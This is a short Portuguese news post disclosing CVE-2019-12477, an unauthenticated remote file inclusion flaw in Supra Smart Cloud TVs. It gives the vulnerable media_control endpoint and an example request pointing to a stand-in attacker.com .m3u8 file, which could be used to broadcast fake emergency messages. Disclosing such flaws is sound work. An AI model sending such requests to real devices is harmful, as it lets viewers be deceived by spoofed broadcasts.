top of page

Descoberta falha de inclusão remota de ficheiro na Supra Smart Cloud TV


Este modelo de smartTV permite incluir qualquer tipo de ficheiro remotamente através de uma função designada por "openLiveURL", a qual permite que um atacante consiga fazer broadcast de um vídeo falso sem qualquer tipo de autenticação. Esta falha é dada pelo CVE 2019-12477.

O diretório específico que está vulnerável a esta falha é:

/remote/media_control?action=setUri&uri=URI

Esta falha está também visível a partir do código-fonte, portanto através de uma inspeção cuidada do mesmo, é possível verificar que os pedidos feitos a este parâmetro podem ser alterados e executar a falha.

Tudo o que o atacante precisa de fazer é enviar um pedido especial ao url citado, por exemplo, http://xx.xx.xx.xx/remote//media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

Apesar de o URL aceitar o formato .m3u8, tudo o que o atacante precisa de fazer é um pedido através do programa cURL, como por exemplo "curl --v -X GET". Este comando irá fazer essencialmente com o que o cliente faça um pedido "GET" a esse recurso web, não precisando de autenticação para tal. Em termos de impacto, o que o atacante pode fazer é simular uma mensagem de emergência.

Não existe ainda solução para este problema, mas espera-se que a marca lance uma correção durante as próximas semanas.

Mais informações aqui: https://www.inputzero.io/2019/06/hacking-smart-tv.html

POSTS RECENTES:
PROCURE POR TAGS:
bottom of page